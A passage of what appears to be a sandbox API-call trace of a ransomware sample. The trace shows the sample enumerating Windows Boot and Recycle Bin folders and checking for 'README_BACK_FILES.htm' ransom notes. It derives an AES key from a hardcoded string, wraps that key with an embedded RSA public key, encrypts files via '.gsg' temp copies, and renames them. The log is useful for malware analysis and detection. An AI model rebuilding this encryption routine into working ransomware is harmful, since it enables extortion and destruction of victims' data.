"c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\readme_back_files.htm")) returned 0x20 [0231.176] FindNextFileA (in: hFindFile=0x394a68, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0 [0231.176] FindClose (in: hFindFile=0x394a68 | out: hFindFile=0x394a68) returned 1 [0231.176] GetFileAttributesA (lpFileName="C:\\\\$Recycle.Bin\\README_BACK_FILES.htm" (normalized: "c:\\$recycle.bin\\readme_back_files.htm")) returned 0x20 [0231.177] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0231.177] FindFirstFileA (in: lpFileName="C:\\\\Boot\\*.*", lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0x394b28 [0231.177] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.178] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.178] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.178] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x76510000 [0231.178] GetProcAddress (hModule=0x76510000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x765d08e0 [0231.178] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f7a8 | out: lpSystemTimeAsFileTime=0x2b9f7a8) [0231.178] GetLastError () returned 0x12 [0231.178] SetLastError (dwErrCode=0x12) [0231.178] GetLastError () returned 0x12 [0231.178] SetLastError (dwErrCode=0x12) [0231.178] GetLastError () returned 0x12 [0231.178] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.179] SetLastError (dwErrCode=0x12) [0231.179] GetLastError () returned 0x12 [0231.180] SetLastError (dwErrCode=0x12) [0231.180] GetLastError () returned 0x12 [0231.180] SetLastError (dwErrCode=0x12) [0231.180] GetLastError () returned 0x12 [0231.180] SetLastError (dwErrCode=0x12) [0231.180] GetLastError () returned 0x12 [0231.180] SetLastError (dwErrCode=0x12) [0231.180] GetLastError () returned 0x12 [0231.180] SetLastError (dwErrCode=0x12) [0231.180] GetLastError () returned 0x12 [0231.180] SetLastError (dwErrCode=0x12) [0231.180] GetLastError () returned 0x12 [0231.180] SetLastError (dwErrCode=0x12) [0231.180] GetLastError () returned 0x12 [0231.180] SetLastError (dwErrCode=0x12) [0231.180] GetFileAttributesA (lpFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log")) returned 0x4 [0231.180] SetFileAttributesA (lpFileName="C:\\\\Boot\\BCD.LOG", dwFileAttributes=0x80) returned 0 [0231.180] CreateFileA (lpFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.181] CreateFileA (lpFileName="C:\\\\Boot\\BCD.LOG.gsg" (normalized: "c:\\boot\\bcd.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.181] SetFileAttributesA (lpFileName="C:\\\\Boot\\BCD.LOG.gsg", dwFileAttributes=0x2) returned 0 [0231.181] CryptAcquireContextA (in: phProv=0x2b9e7a4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e7a4*=0x2dd300) returned 1 [0231.210] CryptCreateHash (in: hProv=0x2dd300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e7a8 | out: phHash=0x2b9e7a8) returned 1 [0231.210] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.210] CryptHashData (hHash=0x3949a8, pbData=0x2ec8a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.211] CryptDeriveKey (in: hProv=0x2dd300, Algid=0x6610, hBaseData=0x3949a8, dwFlags=0x1000000, phKey=0x2b9e794 | out: phKey=0x2b9e794*=0x394a68) returned 1 [0231.215] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e7b0, pcbBinary=0x2b9e790, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e7b0, pcbBinary=0x2b9e790, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.215] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e7b0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e784, pcbStructInfo=0x2b9e78c | out: pvStructInfo=0x2b9e784, pcbStructInfo=0x2b9e78c) returned 1 [0231.217] CryptAcquireContextA (in: phProv=0x2b9e7a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e7a0*=0x27e3198) returned 1 [0231.217] CryptImportPublicKeyInfo (in: hCryptProv=0x27e3198, dwCertEncodingType=0x1, pInfo=0x2e9fb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e9fe8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e9ff0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e798 | out: phKey=0x2b9e798*=0x394828) returned 1 [0231.219] CryptEncrypt (in: hKey=0x394828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e788*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e788*=0x80) returned 1 [0231.219] CryptEncrypt (in: hKey=0x394828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e3a80*, pdwDataLen=0x2b9e79c*=0x18, dwBufLen=0x80 | out: pbData=0x27e3a80*, pdwDataLen=0x2b9e79c*=0x80) returned 1 [0231.219] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e3a80, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e7ac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e7ac, lpOverlapped=0x0) returned 0 [0231.219] ReadFile (in: hFile=0xffffffff, lpBuffer=0x39d038, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e7ac, lpOverlapped=0x0 | out: lpBuffer=0x39d038, lpNumberOfBytesRead=0x2b9e7ac*=0x0, lpOverlapped=0x0) returned 0 [0231.219] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x39d038*, pdwDataLen=0x2b9e7ac*=0x0, dwBufLen=0x400 | out: pbData=0x39d038*, pdwDataLen=0x2b9e7ac*=0x10) returned 1 [0231.220] WriteFile (in: hFile=0xffffffff, lpBuffer=0x39d038, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e7ac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e7ac, lpOverlapped=0x0) returned 0 [0231.220] CloseHandle (hObject=0xffffffff) returned 1 [0231.220] CloseHandle (hObject=0xffffffff) returned 1 [0231.220] CopyFileA (lpExistingFileName="C:\\\\Boot\\BCD.LOG.gsg" (normalized: "c:\\boot\\bcd.log.gsg"), lpNewFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), bFailIfExists=0) returned 0 [0231.220] SetFileAttributesA (lpFileName="C:\\\\Boot\\BCD.LOG", dwFileAttributes=0x4) returned 0 [0231.221] DeleteFileA (lpFileName="C:\\\\Boot\\BCD.LOG.gsg" (normalized: "c:\\boot\\bcd.log.gsg")) returned 0 [0231.221] MoveFileA (lpExistingFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), lpNewFileName="C:\\\\Boot\\BCD.LOG.fuck" (normalized: "c:\\boot\\bcd.log.fuck")) returned 0 [0231.221] CryptDestroyHash (hHash=0x3949a8) returned 1 [0231.221] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.221] CryptReleaseContext (hProv=0x2dd300, dwFlags=0x0) returned 1 [0231.221] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.221] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.221] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.222] FindFirstFileA (in: lpFileName="C:\\\\Boot\\bg-BG\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x394d28 [0231.222] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.222] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.223] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.223] GetLastError () returned 0x5 [0231.223] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetLastError () returned 0x5 [0231.224] SetLastError (dwErrCode=0x5) [0231.224] GetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0231.225] SetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.225] CreateFileA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.225] CreateFileA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.225] SetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.226] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2dd300) returned 1 [0231.228] CryptCreateHash (in: hProv=0x2dd300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.228] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.228] CryptHashData (hHash=0x394de8, pbData=0x2ec828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.228] CryptDeriveKey (in: hProv=0x2dd300, Algid=0x6610, hBaseData=0x394de8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.228] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.228] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.228] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x395b00) returned 1 [0231.228] CryptImportPublicKeyInfo (in: hCryptProv=0x395b00, dwCertEncodingType=0x1, pInfo=0x2ea088*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ea0b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ea0c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394c68) returned 1 [0231.229] CryptEncrypt (in: hKey=0x394c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.229] CryptEncrypt (in: hKey=0x394c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x395b88*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x395b88*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.229] WriteFile (in: hFile=0xffffffff, lpBuffer=0x395b88, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.229] ReadFile (in: hFile=0xffffffff, lpBuffer=0x39d878, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x39d878, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.229] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x39d878*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x39d878*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.229] WriteFile (in: hFile=0xffffffff, lpBuffer=0x39d878, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.229] CloseHandle (hObject=0xffffffff) returned 1 [0231.229] CloseHandle (hObject=0xffffffff) returned 1 [0231.229] CopyFileA (lpExistingFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.230] SetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.230] DeleteFileA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.gsg")) returned 0 [0231.230] MoveFileA (lpExistingFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.fuck")) returned 0 [0231.230] CryptDestroyHash (hHash=0x394de8) returned 1 [0231.230] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.230] CryptReleaseContext (hProv=0x2dd300, dwFlags=0x0) returned 1 [0231.230] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.231] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.231] FindClose (in: hFindFile=0x394d28 | out: hFindFile=0x394d28) returned 1 [0231.231] GetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\README_BACK_FILES.htm" (normalized: "c:\\boot\\bg-bg\\readme_back_files.htm")) returned 0x20 [0231.231] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.231] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.231] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.231] FindFirstFileA (in: lpFileName="C:\\\\Boot\\cs-CZ\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x394d28 [0231.233] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.233] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.234] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.234] SetLastError (dwErrCode=0x12) [0231.234] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetLastError () returned 0x12 [0231.235] SetLastError (dwErrCode=0x12) [0231.235] GetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0231.236] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.236] CreateFileA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.236] CreateFileA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.236] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.236] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x395a38) returned 1 [0231.239] CryptCreateHash (in: hProv=0x395a38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.239] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.239] CryptHashData (hHash=0x394ba8, pbData=0x2ecaa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.239] CryptDeriveKey (in: hProv=0x395a38, Algid=0x6610, hBaseData=0x394ba8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394768) returned 1 [0231.239] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.239] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.239] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2f3cc0) returned 1 [0231.239] CryptImportPublicKeyInfo (in: hCryptProv=0x2f3cc0, dwCertEncodingType=0x1, pInfo=0x2761220*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2761250*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2761258*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394de8) returned 1 [0231.239] CryptEncrypt (in: hKey=0x394de8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.239] CryptEncrypt (in: hKey=0x394de8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f3d48*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2f3d48*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.240] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2f3d48, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.240] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27613e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27613e8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.240] CryptEncrypt (in: hKey=0x394768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27613e8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27613e8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.240] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27613e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.240] CloseHandle (hObject=0xffffffff) returned 1 [0231.240] CloseHandle (hObject=0xffffffff) returned 1 [0231.240] CopyFileA (lpExistingFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.240] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.240] DeleteFileA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.gsg" (normalized: 